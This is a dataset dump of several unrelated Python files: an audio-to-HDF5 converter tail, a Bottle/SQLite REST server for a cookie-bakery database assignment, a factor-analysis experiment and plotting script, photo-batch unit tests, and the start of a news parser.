combination_group.create_group(r'DIRTY')\n dirty_group.create_dataset('FREQ', data=dirty_freq)\n dirty_group.create_dataset('TIME', data=dirty_time)\n dirty_group.create_dataset('DB', data=dirty_db)\n dirty_group.create_dataset('PHASE', data=dirty_phase)\n dirty_group.attrs.create(np.string_('FFT@SIZE'), np.int32(self.__N_SAMPLES_WINDOW))\n dirty_group.attrs.create(np.string_('FFT@N_SAMPLES_OVERLAP'), np.int32(self.__N_SAMPLES_OVERLAP))\n dirty_group.attrs.create(np.string_('FFT@WINDOW'), np.string_(self.__WINDOW))\n\n @staticmethod\n def load_audio(path, normalized=True):\n ext = os.path.splitext(path)[1][1:]\n logging.info('Loading audio ' + path + ' with file type ' + ext)\n rawSound = AudioSegment.from_file(path, ext)\n if rawSound.channels != 1:\n logging.info('Audio contains more than one channel. Setting to single channel')\n rawSound = rawSound.set_channels(1)\n if normalized:\n logging.info('Normalize audio')\n return effects.normalize(rawSound)\n else:\n return rawSound\n\n\nif __name__ == \"__main__\":\n try:\n # set up logging to file\n logging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(name)-20s %(levelname)-8s %(message)s',\n datefmt='%m-%d %H:%M',\n filename='./DataConverter.log',\n filemode='w+')\n # define a Handler which writes DEBUG messages or higher to the sys.stderr\n console = logging.StreamHandler()\n console.setLevel(logging.DEBUG)\n # set a format which is simpler for console use\n formatter = logging.Formatter('%(asctime)s %(name)-20s %(levelname)-8s %(message)s')\n # tell the handler to use this format\n console.setFormatter(formatter)\n # add the handler to the root logger\n logging.getLogger('').addHandler(console)\n\n parser = ArgumentParser()\n parser.add_argument(\"-d\", \"--download\", action='count', help=\"Download data and log into database\", default=0)\n parser.add_argument(\"-f\", \"--file\", help=\"H5 file name\", default='./h5_default.h5')\n parser.add_argument(\"-m\", \"--mode\", choices=['r', 'r+', 'w', 'a'], help=\"Mode of opening h5 file\", default='a')\n parser.add_argument(\"-n\", \"--noise\", help=\"Noises to mix in h5 file\", type=str, nargs='+',)\n parser.add_argument(\"-l\", \"--limit\", help=\"Number of tracks (0 means all)\", type=int, default=0, )\n args = parser.parse_args()\n\n logging.info('Starting program execution')\n data_manager = DataManager()\n data_manager.main(filename=args.file, mode=args.mode, download=args.download,\n noises=args.noise, limit=args.limit)\n except Exception as e:\n logging.error('Something was wrong', exc_info=True)\n","sub_path":"listings/DataConverter.py","file_name":"DataConverter.py","file_ext":"py","file_size_in_byte":11706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"476197028","text":"from bottle import get, post, run, request, response, delete, put\nimport sqlite3\nimport json\n\nHOST = 'localhost'\nPORT = 8888\n\nconn = sqlite3.connect(\"krustyDB.sqlite\")\n\n#---------------SOLVING THE ASSINGMENTS-----------------------------\n\n@post('/reset')\ndef reset():\n\n c = conn.cursor()\n c.execute(\n \"\"\"\n DELETE FROM cookies\n \"\"\"\n )\n c.execute(\n \"\"\"\n DELETE FROM ingredients\n \"\"\"\n )\n c.execute(\n \"\"\"\n DELETE FROM recipes\n \"\"\"\n )\n c.execute(\n \"\"\"\n DELETE FROM pallets\n \"\"\"\n )\n c.execute(\n \"\"\"\n DELETE FROM orders\n \"\"\"\n )\n c.execute(\n \"\"\"\n DELETE FROM cookie_orders\n \"\"\"\n )\n c.execute(\n \"\"\"\n DELETE FROM customers\n \"\"\"\n )\n c.execute(\n \"\"\"\n INSERT\n INTO cookies(name)\n VALUES ('Nut ring'),\n ('Nut cookie'),\n ('Amneris'),\n ('Tango'),\n ('Almond delight'),\n ('Berliner')\n \"\"\"\n )\n c.execute(\n \"\"\"\n INSERT\n INTO ingredients(name, quantity_in_stock, unit)\n VALUES ('Flour', 100000, 'g'),\n ('Butter', 100000, 'g'),\n ('Icing sugar', 100000, 'g'),\n ('Roasted, chopped nuts', 100000, 'g'),\n ('Fine-ground nuts', 100000, 'g'),\n ('Ground, roasted nuts', 100000, 'g'),\n ('Bread crumbs', 100000, 'g'),\n ('Sugar', 100000, 'g'),\n ('Egg whites', 100000, 'ml'),\n ('Chocolate', 100000, 'g'),\n ('Marzipan',100000, 'g'),\n ('Eggs', 100000, 'g'),\n ('Potato starch', 100000, 'g'),\n ('Wheat flour', 100000, 'g'),\n ('Sodium bicarbonate', 100000, 'g'),\n ('Vanilla', 100000, 'g'),\n ('Chopped almonds', 100000, 'g'),\n ('Cinnamon', 100000, 'g'),\n ('Vanilla sugar', 100000, 'g')\n \"\"\"\n )\n c.execute(\n \"\"\"\n INSERT\n INTO recipes(cookie, ingredient, quantity)\n VALUES ('Nut ring','Flour',450),\n ('Nut ring','Butter',450),\n ('Nut ring','Icing sugar',190),\n ('Nut ring','Roasted, chopped nuts',225),\n ('Nut cookie','Fine-ground nuts',750),\n ('Nut cookie','Ground, roasted nuts',625),\n ('Nut cookie','Bread crumbs',125),\n ('Nut cookie','Sugar',375),\n ('Nut cookie','Egg whites',350),\n ('Nut cookie','Chocolate',50),\n ('Amneris','Marzipan',750),\n ('Amneris','Butter',250),\n ('Amneris','Eggs',250),\n ('Amneris','Potato starch',25),\n ('Amneris','Wheat flour',25),\n ('Tango','Butter',200),\n ('Tango','Sugar',250),\n ('Tango','Flour',300),\n ('Tango','Sodium bicarbonate',4),\n ('Tango','Vanilla',2),\n ('Almond delight','Butter',400),\n ('Almond delight','Sugar',270),\n ('Almond delight','Chopped almonds',279),\n ('Almond delight','Flour',400),\n ('Almond delight','Cinnamon',10),\n ('Berliner','Flour',350),\n ('Berliner','Butter',250),\n ('Berliner','Icing sugar',100),\n ('Berliner','Eggs',50),\n ('Berliner','Vanilla sugar',5),\n ('Berliner','Chocolate',50)\n \"\"\"\n )\n c.execute(\n \"\"\"\n INSERT\n INTO customers(name, address)\n VALUES ('Finkakor AB', 'Helsingborg'),\n ('Smabrod AB', 'Malmo'),\n ('Kaffebrod AB', 'Landskrona'),\n ('Bjudkakor AB', 'Ystad'),\n ('Kalaskakor AB', 'Trelleborg'),\n ('Partykakor AB', 'Kristianstad'),\n ('Gastkakor AB', 'Hassleholm'),\n ('Skanekakor AB', 'Perstorp')\n \"\"\"\n )\n conn.commit()\n c.close()\n response.status = 200\n return json.dumps({\"status\": \"ok\"}, indent=4)\n\n@get('/customers')\ndef customers():\n c = conn.cursor()\n c.execute(\n \"\"\"\n SELECT name, address\n FROM customers\n\tORDER BY name\n \"\"\"\n )\n s = [{\"name\": name, \"address\": address}\n for (name, address,) in c]\n return json.dumps({\"customers\": s}, indent=4)\n\n@get('/ingredients')\ndef ingredients():\n c = conn.cursor()\n c.execute(\n \"\"\"\n SELECT name, quantity_in_stock, unit\n FROM ingredients\n\tORDER BY name\n \"\"\"\n )\n s = [{\"name\": name, \"quantity\": quantity_in_stock, \"unit\": unit}\n for (name, quantity_in_stock, unit,) in c]\n return json.dumps({\"ingredients\": s}, indent=4)\n\n@get('/cookies')\ndef cookies():\n c = conn.cursor()\n lista = c.execute(\n \"\"\"\n SELECT name\n FROM cookies\n\tORDER BY name\n \"\"\"\n )\n\n s = [{\"name\": name}\n for (name,) in c]\n return json.dumps({\"cookies\": s}, indent=4)\n\n@get('/recipes')\ndef recipes():\n c = conn.cursor()\n c.execute(\n \"\"\"\n SELECT cookie, recipes.ingredient, quantity, unit\n FROM recipes\n\tJOIN ingredients\n\tON ingredients.name = recipes.ingredient\n\tORDER BY cookie, recipes.ingredient\n \"\"\"\n )\n s = [{\"cookie\": cookie, \"ingredient\": recipes.ingredient,\"quantity\": quantity,\"unit\": unit}\n for (cookie, recipes.ingredient, quantity, unit,) in c]\n return json.dumps({\"recipes\": s}, indent=4)\n\n@get('/pallets')\ndef get_pallets():\n response.content_type= 'application/json'\n query = \"\"\"\n SELECT pallet_id, cookie, produced, name, blocked\n FROM pallets\n LEFT JOIN orders\n USING (order_id)\n WHERE 1 = 1\n \"\"\"\n params = []\n if request.query.cookie:\n query += \"AND cookie = ?\"\n params.append(request.query.cookie)\n if request.query.blocked:\n query += \"AND blocked = ?\"\n params.append(request.query.blocked)\n if request.query.after:\n query += \"AND produced > ?\"\n params.append(request.query.after)\n if request.query.before:\n query += \"AND produced < ?\"\n params.append(request.query.before)\n c = conn.cursor()\n c.execute(\n query,\n params\n )\n s = [{\"id\":pallet_id, \"cookie\":cookie,\"productionDate\":produced,\"customer\":name,\"blocked\":blocked}\n for(pallet_id, cookie, produced, name, blocked,) in c]\n response.status = 200\n return json.dumps({\"pallets\": s}, indent=4)\n\n@post('/pallets')\ndef post_pallets():\n response.content_type= 'application/json'\n cookie = request.query.cookie\n c = conn.cursor()\n cookieList = c.execute(\n \"\"\"\n SELECT name\n FROM cookies\n WHERE name = ?\n \"\"\"\n ,\n [cookie]\n ).fetchall()\n\n if len(cookieList) == 0:\n s = {\"status\": \"no such cookie\"}\n c.close()\n response.status = 400\n return json.dumps(s, indent=4)\n else:\n try:\n c.execute(\n \"\"\"\n WITH ingredients_needed AS(\n SELECT ingredient\n FROM recipes\n WHERE cookie = ?\n )\n UPDATE ingredients\n SET quantity_in_stock = quantity_in_stock - 54*(SELECT quantity\n FROM recipes\n WHERE cookie = ?\n AND ingredients.name = recipes.ingredient)\n WHERE name IN ingredients_needed\n \"\"\"\n ,\n [cookie, cookie]\n )\n except:\n s = {\"status\": \"not enough ingredients\"}\n c.close()\n response.status = 400\n return json.dumps(s, indent=4)\n c.execute(\n \"\"\"\n INSERT\n INTO pallets (cookie)\n VALUES (?)\n \"\"\"\n ,\n [cookie]\n )\n conn.commit()\n c.execute(\n \"\"\"\n SELECT pallet_id\n FROM pallets\n WHERE rowid = last_insert_rowid()\n \"\"\"\n )\n id = c.fetchone()[0]\n s = {\"status\": \"ok\", \"id\": id}\n c.close()\n response.status = 200\n return json.dumps(s, indent=4)\n\n\n@post('/block/<cookie>/<from_date>/<to_date>')\ndef block(cookie, from_date, to_date):\n\tc = conn.cursor()\n\tc.execute(\n\t\"\"\"\n\tUPDATE pallets\n\tSET blocked = 1\n\tWHERE cookie = ?\n\t\tAND produced >= ?\n\t\t\tAND produced <= ?\n\t\"\"\"\n\t,\n\t[cookie, from_date, to_date]\n\t)\n\ts = [{\"status\": \"ok\"}]\n\tc.close()\n\tresponse.status = 200\n\treturn json.dumps({\"status\": \"ok\"}, indent=4)\n\n\n@post('/unblock/<cookie>/<from_date>/<to_date>')\ndef unblock(cookie, from_date, to_date):\n\tc = conn.cursor()\n\tc.execute(\n\t\"\"\"\n\tUPDATE pallets\n\tSET blocked = 0\n\tWHERE cookie = ?\n\t\tAND produced >= ?\n\t\t\tAND produced <= ?\n\t\"\"\"\n\t,\n\t[cookie, from_date, to_date]\n\t)\n\ts = [{\"status\": \"ok\"}]\n\tc.close()\n\tresponse.status = 200\n\treturn json.dumps({\"status\": \"ok\"}, indent=4)\n\nrun(host=HOST, port=PORT, reloader=True, debug=True)","sub_path":"krusty_server.py","file_name":"krusty_server.py","file_ext":"py","file_size_in_byte":8965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"493184666","text":"\nimport sys\nimport numpy as np\nimport os\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import MaxNLocator\nfrom time import time\n\nsys.path.insert(0, \"../\")\n\nfrom mcfa import (mcfa, grid_search, mpl_utils, utils)\n\nmatplotlib.style.use(mpl_utils.mpl_style)\ncolors = plt.rcParams['axes.prop_cycle'].by_key()['color']\n\n\nn_features = D = 15\nn_components = K = 10\nn_latent_factors = J = 5\nn_samples = N = 10_000\n\nomega_scale = 1\nnoise_scale = 1\nrandom_seed = 100\n\ndata_kwds = dict(n_features=n_features,\n n_components=n_components,\n n_latent_factors=n_latent_factors,\n n_samples=n_samples,\n omega_scale=omega_scale,\n noise_scale=noise_scale,\n random_seed=random_seed)\n\n\ndef savefig(fig, suffix):\n prefix = os.path.basename(__file__)[:-3]\n here = os.path.dirname(os.path.realpath(__file__))\n filename = os.path.join(here, f\"{prefix}-{suffix}\")\n fig.savefig(f\"{filename}.pdf\", dpi=300)\n fig.savefig(f\"{filename}.png\", dpi=150)\n print(f\"Created figures {filename}.png and {filename}.pdf\")\n\n\nmcfa_kwds = dict(tol=1e-5, \n max_iter=1_000,\n init_factors=\"random\",\n init_components=\"random\",\n random_seed=random_seed)\n\n\n\n\nY, truth = utils.generate_data(**data_kwds)\ntruth_packed = (truth[\"pi\"], truth[\"A\"], truth[\"xi\"], truth[\"omega\"], truth[\"psi\"])\n\n\n# Fit with true number of latent factors and components.\nmodel = mcfa.MCFA(n_components=data_kwds[\"n_components\"],\n n_latent_factors=data_kwds[\"n_latent_factors\"],\n **mcfa_kwds)\ntick = time()\nmodel.fit(Y)\ntock = time()\n\nmodel.message_length(Y)\n\nprint(f\"Model took {tock - tick:.1f} seconds\")\n\n\n# Plot the true latent factors w.r.t. the estimated ones, after rotation.\nA_true = truth[\"A\"]\nA_est = model.theta_[model.parameter_names.index(\"A\")]\n\n#R, *_ = utils.find_rotation_matrix(A_true, A_est, n_inits=100)\n\n# Get exact transformation.\nR = utils.exact_rotation_matrix(A_true, A_est)\n\n# Now make it a valid rotation matrix.\nL = linalg.cholesky(R.T @ R)\nR = R @ linalg.solve(L, np.eye(n_latent_factors))\n\n\nA_est_rot = A_est @ R\n\n\nD, J = A_true.shape\nxi = 1 + np.arange(D)\n\nfig_factor_loads, ax = plt.subplots()\n\nfor j in range(J):\n ax.plot(xi, A_est.T[j], \":\", lw=1, c=colors[j])\n ax.plot(xi, A_est_rot.T[j], \"-\", lw=1, c=colors[j])\n ax.plot(xi, A_true.T[j], \"-\", lw=2, c=colors[j])\n\nax.set_xticks(xi)\nax.set_xlabel(r\"$\\textrm{dimension}$\")\nax.set_ylabel(r\"$\\mathbf{L}$\")\n\nylim = np.ceil(10 * np.abs(ax.get_ylim()).max()) / 10\nax.plot([0, D + 1], [0, 0], \":\", c=\"#000000\", zorder=-1, lw=0.5)\nax.set_xlim(0.5, D + 0.5)\n\nax.set_ylim(-ylim, +ylim)\nax.set_yticks([-ylim, 0, ylim])\n\nfig_factor_loads.tight_layout()\nsavefig(fig_factor_loads, \"factor_loads\")\n\n\n\n# Plot the latent space.\ncmap = mpl_utils.discrete_cmap(n_components, \"Spectral\")\n\nlabel_names = [f\"$\\\\mathbf{{S}}_{{{i}}}$\" for i in range(n_latent_factors)]\nfig_latent = mpl_utils.plot_latent_space(model, Y, cmap=cmap,\n label_names=label_names)\nfor ax in fig_latent.axes:\n if ax.get_visible():\n if ax.is_last_row():\n ax.xaxis.set_major_locator(MaxNLocator(3))\n if ax.is_first_col():\n ax.yaxis.set_major_locator(MaxNLocator(3))\n\n xlim = np.max(np.abs(ax.get_xlim()))\n ylim = np.max(np.abs(ax.get_ylim()))\n ax.set_xlim(-xlim, +xlim)\n ax.set_ylim(-ylim, +ylim)\nfig_latent.tight_layout()\nfig_latent.subplots_adjust(hspace=0, wspace=0)\nsavefig(fig_latent, \"latent\")\n\n\n\nll, tau = model.expectation(Y, *model.theta_)\n\nmodel.rotate(R)\n\nll2, tau = model.expectation(Y, *model.theta_)\n\nprint(f\"Difference in log-likeihood after rotation: {ll - ll2}\")\n\n\n# Take model with true number of components and latent factors.\n\nscatter_kwds = dict(s=25, rasterized=True, c=\"tab:blue\")\n\n\n# Compare factor loads to true values.\nfrom matplotlib import gridspec\n\nfig = plt.figure()\ngs = gridspec.GridSpec(2, 1, height_ratios=[1, 4])\n\nax_residual = fig.add_subplot(gs[0])\nax = fig.add_subplot(gs[1])\n\nA_est = model.theta_[model.parameter_names.index(\"A\")]\n\nx, y = (A_true.flatten(), A_est.flatten())\nax.scatter(x, y, **scatter_kwds)\nax_residual.scatter(x, y - x, **scatter_kwds)\n\nlims =lims = np.max(np.abs(np.hstack([ax.get_xlim(), ax.get_ylim()])))\nkwds = dict(c=\"#666666\", linestyle=\":\", linewidth=0.5, zorder=-1)\nax.plot([-lims, +lims], [-lims, +lims], \"-\", **kwds)\nax_residual.plot([-lims, +lims], [0, 0], \"-\", **kwds)\n\n\nax.set_xlim(-lims, +lims)\nax.set_ylim(-lims, +lims)\nax_residual.set_xlim(-lims, +lims)\nylim = np.max(np.abs(ax_residual.get_ylim()))\nax_residual.set_ylim(-ylim, +ylim)\n\n\nax_residual.yaxis.set_major_locator(MaxNLocator(3))\nax_residual.xaxis.set_major_locator(MaxNLocator(5))\nax.xaxis.set_major_locator(MaxNLocator(5))\nax.yaxis.set_major_locator(MaxNLocator(5))\n\nax_residual.set_xticks([])\n\nax.set_xlabel(r\"$\\mathbf{L}_\\textrm{true}$\")\nax.set_ylabel(r\"$\\mathbf{L}_\\textrm{est}$\")\nax_residual.set_ylabel(r\"$\\Delta\\mathbf{L}$\")\n\nfig.tight_layout()\n\nsavefig(fig, \"compare-loads\")\n\n\n# Compare factor scores to true values.\nx = truth[\"scores\"].flatten()\ny = model.factor_scores(Y)[1].flatten()\n \n\n# Compare factor loads to true values.\nfig = plt.figure()\ngs = gridspec.GridSpec(2, 1, height_ratios=[1, 4])\n\nax_residual = fig.add_subplot(gs[0])\nax = fig.add_subplot(gs[1])\n\nax.scatter(x, y, **scatter_kwds)\nax_residual.scatter(x, y - x, **scatter_kwds)\n\nlims = np.max(np.abs(np.hstack([ax.get_xlim(), ax.get_ylim()])))\nkwds = dict(c=\"#666666\", linestyle=\":\", linewidth=0.5, zorder=-1)\nax.plot([-lims, +lims], [-lims, +lims], \"-\", **kwds)\nax_residual.plot([-lims, +lims], [0, 0], \"-\", **kwds)\n\nax.set_xlim(-lims, +lims)\nax.set_ylim(-lims, +lims)\nax_residual.set_xlim(-lims, +lims)\nylim = np.max(np.abs(ax_residual.get_ylim()))\nax_residual.set_ylim(-ylim, +ylim)\n\nax_residual.yaxis.set_major_locator(MaxNLocator(3))\nax_residual.xaxis.set_major_locator(MaxNLocator(5))\nax.xaxis.set_major_locator(MaxNLocator(5))\nax.yaxis.set_major_locator(MaxNLocator(5))\nax_residual.set_xticks([])\n\n\nax.set_xlabel(r\"$\\mathbf{S}_\\textrm{true}$\")\nax.set_ylabel(r\"$\\mathbf{S}_\\textrm{est}$\")\nax_residual.set_ylabel(r\"$\\Delta\\mathbf{S}$\")\n\nfig.tight_layout()\n\nsavefig(fig, \"compare-scores\")\n\n\n# Compare specific scatter values to true values.\nx = truth[\"psi\"].flatten()\ny = model.theta_[-1]\n\n\nfig = plt.figure()\ngs = gridspec.GridSpec(2, 1, height_ratios=[1, 4])\n\nax_residual = fig.add_subplot(gs[0])\nax = fig.add_subplot(gs[1])\n\n\nax.scatter(x, y, **scatter_kwds)\nax_residual.scatter(x, y - x, **scatter_kwds)\n\nlims = np.max(np.abs(np.hstack([ax.get_xlim(), ax.get_ylim()])))\nkwds = dict(c=\"#666666\", linestyle=\":\", linewidth=0.5, zorder=-1)\nax.plot([-lims, +lims], [-lims, +lims], \"-\", **kwds)\nax_residual.plot([-lims, +lims], [0, 0], \"-\", **kwds)\n\nax.set_xlim(0, +lims)\nax.set_ylim(0, +lims)\nax_residual.set_xlim(0, lims)\nylim = np.max(np.abs(ax_residual.get_ylim()))\nax_residual.set_ylim(-ylim, +ylim)\n\nax_residual.yaxis.set_major_locator(MaxNLocator(3))\nax_residual.xaxis.set_major_locator(MaxNLocator(5))\nax.xaxis.set_major_locator(MaxNLocator(5))\nax.yaxis.set_major_locator(MaxNLocator(5))\nax_residual.set_xticks([])\n\n\nax.set_xlabel(r\"$\\mathbf{D}_\\textrm{true}$\")\nax.set_ylabel(r\"$\\mathbf{D}_\\textrm{est}$\")\nax_residual.set_ylabel(r\"$\\Delta\\mathbf{D}$\")\n\nfig.tight_layout()\n\nsavefig(fig, \"compare-specific-scatter\")\n\n\n\n\nscatter_kwds = dict(s=1, rasterized=True, c=\"#000000\")\n\nfig = plt.figure(figsize=(7.5, 3.09))\n\n\ngs = gridspec.GridSpec(2, 3, height_ratios=[1, 4], width_ratios=[1, 1, 1])\n\nA_est = model.theta_[model.parameter_names.index(\"A\")]\n\nxs = [\n A_true.flatten(),\n truth[\"scores\"].flatten(),\n truth[\"psi\"].flatten()\n]\n\nys = [\n A_est.flatten(),\n model.factor_scores(Y)[1].flatten(),\n model.theta_[-1]\n]\n\nxlabels = [\n r\"$\\mathbf{L}_\\textrm{true}$\",\n r\"$\\mathbf{S}_\\textrm{true}$\",\n r\"$\\mathbf{D}_\\textrm{true}$\"\n]\n\nylabels = [\n r\"$\\mathbf{L}_\\textrm{est}$\",\n r\"$\\mathbf{S}_\\textrm{est}$\",\n r\"$\\mathbf{D}_\\textrm{est}$\"\n]\n\ndelta_labels = [\n r\"$\\Delta\\mathbf{L}$\",\n r\"$\\Delta\\mathbf{S}$\",\n r\"$\\Delta\\mathbf{D}$\"\n]\n\nidx = 0\nfor i in range(3):\n ax_residual = fig.add_subplot(gs[idx])\n ax = fig.add_subplot(gs[idx +3])\n\n x, y = (xs[i], ys[i])\n\n ax.scatter(x, y, **scatter_kwds)\n ax_residual.scatter(x, y - x, **scatter_kwds)\n\n lims = np.max(np.abs(np.hstack([ax.get_xlim(), ax.get_ylim()])))\n if i == 2:\n lims = (0, +lims)\n else:\n lims = (-lims, +lims)\n\n kwds = dict(c=\"#666666\", linestyle=\":\", linewidth=0.5, zorder=-1)\n ax.plot([lims[0], +lims[1]], [lims[0], +lims[1]], \"-\", **kwds)\n ax_residual.plot([lims[0], +lims[1]], [0, 0], \"-\", **kwds)\n\n ax.set_xlim(lims[0], +lims[1])\n ax.set_ylim(lims[0], +lims[1])\n ax_residual.set_xlim(lims[0], +lims[1])\n ylim = np.max(np.abs(ax_residual.get_ylim()))\n ax_residual.set_ylim(-ylim, +ylim)\n\n ax_residual.yaxis.set_major_locator(MaxNLocator(3))\n ax_residual.xaxis.set_major_locator(MaxNLocator(3))\n ax.xaxis.set_major_locator(MaxNLocator(3))\n ax.yaxis.set_major_locator(MaxNLocator(3))\n ax_residual.set_xticks([])\n\n\n ax.set_xlabel(xlabels[i])\n ax.set_ylabel(ylabels[i])\n ax_residual.set_ylabel(delta_labels[i])\n\n #ax.set_aspect(1.0)\n #ax_residual.set_aspect(1)\n idx += 1\n\nfig.tight_layout()\nsavefig(fig, \"compare-all\")\n\n\n\n# Plot the log-likelihood with increasing iterations.\nfig_iterations, ax = plt.subplots()\n\nll = np.array(model.log_likelihoods_)\niterations = 1 + np.arange(len(ll))\nax.plot(iterations, ll, \"-\", lw=2, drawstyle=\"steps-mid\")\nax.set_xlabel(r\"$\\textrm{iteration}$\")\nax.set_ylabel(r\"$\\log{\\mathcal{L}}$\")\nax.set_xlim(0, iterations[-1] + 1)\nax.xaxis.set_major_locator(MaxNLocator(6))\nax.yaxis.set_major_locator(MaxNLocator(6))\nxt = ax.get_xticks()\nax.set_xticks(xt + np.hstack([1, np.zeros(xt.size - 1)]))\nax.set_xlim(0, iterations[-1] + 1)\nfig_iterations.tight_layout()\nsavefig(fig_iterations, \"ll-iterations\")\n\n\n# Plot the data, with samples\nY_drawn = model.sample(data_kwds[\"n_samples\"])\nfig_data = mpl_utils.corner_scatter(Y, \n c=\"#000000\", s=1, alpha=0.5, figsize=(8, 8))\nmpl_utils.corner_scatter(Y_drawn,\n c=\"tab:blue\", s=1, alpha=0.25, zorder=10, fig=fig_data)\n\nfig_data.tight_layout()\nfig_data.subplots_adjust(hspace=0, wspace=0)\nsavefig(fig_data, \"data\")\n\n\n\n\n\n# Compare specific scatter to true values.\n# TODO:\n\n\n\nfig_data2 = mpl_utils.corner_scatter(Y, \n c=truth[\"R\"], cmap=\"Spectral\",\n s=1, alpha=0.5, figsize=(8, 8),\n label_names=[r\"$\\mathbf{{Y}}_{{{0}}}$\".format(i) for i in range(n_features)])\nfig_data2.tight_layout()\nfig_data2.subplots_adjust(hspace=0, wspace=0)\nsavefig(fig_data2, \"data-colour\")\n\n\ngridsearch_max_latent_factors = 10\ngridsearch_max_components = 20\n\n\n# Do a grid search.\n\nJm = np.arange(1, 1 + gridsearch_max_latent_factors)\nKm = np.arange(1, 1 + gridsearch_max_components)\nJ_grid, K_grid, converged, metrics = grid_search.grid_search(Jm, Km, Y,\n N_inits=1,\n mcfa_kwds=mcfa_kwds)\nll = metrics[\"ll\"]\nbic = metrics[\"bic\"]\nmml = metrics[\"message_length\"]\n\nidx = np.nanargmin(bic)\njm_b, km_b = Jm[idx % bic.shape[1]], Km[int(idx / bic.shape[1])]\n\nidx = np.nanargmin(mml)\njm_m, km_m = Jm[idx % mml.shape[1]], Km[int(idx / mml.shape[1])]\n\n\nJ_true, K_true = (data_kwds[\"n_latent_factors\"], data_kwds[\"n_components\"])\n\nprint(f\"BIC is lowest at J = {jm_b} and K = {km_b}\")\nprint(f\"MML is lowest at J = {jm_m} and K = {km_m}\")\n\nprint(f\"True values are J = {J_true} and K = {K_true}\")\n\n\n\nkwds = dict(converged=converged, \n marker_function=np.nanargmin, \n N=1000, \n cmap=\"Spectral_r\",\n truth=(J_true, K_true))\n\nfig_ll = mpl_utils.plot_filled_contours(J_grid, K_grid, -ll,\n colorbar_label=r\"$-\\log\\mathcal{L}(\\boldsymbol{\\mathbf{Y}}|\\boldsymbol{\\mathbf{D}})$\", \n **kwds)\nfig_ll.axes[0].set_yticks([1, 5, 10, 15, 20])\n\nfig_bic = mpl_utils.plot_filled_contours(J_grid, K_grid, bic,\n colorbar_label=r\"$\\textrm{BIC}$\", \n **kwds)\nfig_bic.axes[0].set_yticks([1, 5, 10, 15, 20])\n\n\nfig_mml = mpl_utils.plot_filled_contours(J_grid, K_grid, mml,\n colorbar_label=r\"$I\\left(\\boldsymbol{\\mathbf{Y}}|\\boldsymbol{\\mathbf{D}}\\right)$\", \n **kwds)\nfig_mml.axes[0].set_yticks([1, 5, 10, 15, 20])\n\n\nsavefig(fig_ll, \"gridsearch-ll-contours\")\nsavefig(fig_bic, \"gridsearch-bic-contours\")\nsavefig(fig_mml, \"gridsearch-mml-contours\")\n\n\n# Save grid search output in case we need it in future.\n","sub_path":"article/experiments/exp1.py","file_name":"exp1.py","file_ext":"py","file_size_in_byte":12979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"284666737","text":"import pythonpath\nfrom os import chdir, getcwd, walk\nfrom os.path import curdir, join, normpath\nimport photobatch as pb\nfrom photobatch import photobatch, PhotoBatchBug1, PhotoBatchBug2\nfrom prepare import main as prepare\nfrom unittest import TestCase, TestProgram\n\n_ls = r'''\n2003-11/2003-11-06T13.46.08.jpeg\n2013-07/2013-07-04T19.15.41.adc8.jpeg\n2013-07/2013-07-04T19.15.41.da39.jpeg\n2013-07/2013-07-04T19.15.41.e5fa.jpeg\n2013-07/2013-07-04T19.16.25.jpeg\n2013-07/2013-07-05T15.13.56.jpeg\nh.png\n'''[1:].splitlines(False)\n\n_ls_rare_case = r'''\n2003-11/2003-11-06T13.46.08.jpeg\n2013-07/2013-07-04T19.15.41.adc8.00.jpeg\n2013-07/2013-07-04T19.15.41.adc8.01.jpeg\n2013-07/2013-07-04T19.15.41.e5fa.jpeg\n2013-07/2013-07-04T19.16.25.jpeg\n2013-07/2013-07-05T15.13.56.jpeg\nh.png\n'''[1:].splitlines(False)\n\nclass T(TestCase):\n def setUp(self):\n self.cwd = getcwd()\n prepare()\n pb.simulate_bug1 = False\n pb.simulate_bug2 = False\n pb.simulate_rare_case = False\n def tearDown(self):\n chdir(self.cwd)\n prepare()\n def test0normal(self):\n expected = _ls\n expected = expected, expected\n photobatch(pb.test_base)\n a = sorted(ls(pb.test_base))\n photobatch(pb.test_base)\n b = sorted(ls(pb.test_base))\n got = a, b\n self.assertEquals(expected, got)\n def test1bug1(self):\n pb.simulate_bug1 = True\n self.assertRaises(PhotoBatchBug1, photobatch, pb.test_base)\n def test2bug2(self):\n pb.simulate_bug2 = True\n self.assertRaises(PhotoBatchBug2, photobatch, pb.test_base)\n def test3rare_case(self):\n pb.simulate_rare_case = True\n expected = _ls_rare_case\n expected = expected, expected\n photobatch(pb.test_base)\n a = sorted(ls(pb.test_base))\n photobatch(pb.test_base)\n b = sorted(ls(pb.test_base))\n got = a, b\n self.assertEquals(expected, got)\n\ndef ls(dir):\n chdir(dir)\n for prefix, dirs, files in walk(curdir):\n for file in files:\n yield normpath(join(prefix, file))\n","sub_path":"last-dropbox/photo-batch/tests/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"626695448","text":"from connecting_function import connecting_function\r\nfrom lxml import etree\r\nimport time\r\nimport datetime\r\n\r\ndef parsing_news_omitted():\r\n from urllib.request import urlopen # Library for urlopen\r\n from bs4 import BeautifulSoup # Library for html parser (scraper), lxml is also nice\r\n numbers = [\"zero\", \"one\", \"two\", \"three\", \"four\", \"five\", \"six\", \"seven\", \"eight\", \"nine\", \"ten\", \"eleven\",\r\n \"twelve\", \"thirteen\", \"fourteen\", \"fifteen\", \"sixteen\", \"seventeen\", \"eighteen\", \"nineteen\", \"twenty\",\r\n \"twentyone\", \"twentytwo\", \"twentythree\", \"twentyfour\", \"twentyfive\", \"twentysix\", \"twentyseven\",\r\n \"twentyeight\", \"twentynine\", \"thirty\", \"thirtyone\", \"thirtytwo\", \"thirtythree\", \"thirtyfour\",\r\n \"thirtyfive\", \"thirtysix\", \"thirtyseven\", \"thirtyeight\", \"thirtynine\", \"forty\", \"fortyone\", \"fortytwo\",\r\n \"fortythree\", \"fortyfour\", \"fortyfive\", \"fortysix\", \"fortyseven\", \"fortyeight\", \"fortynine\", \"fifty\",\r\n \"fiftyone\", \"fiftytwo\", \"fiftythree\", \"fiftyfour\", \"fiftyfive\", \"fiftysix\", \"fiftyseven\", 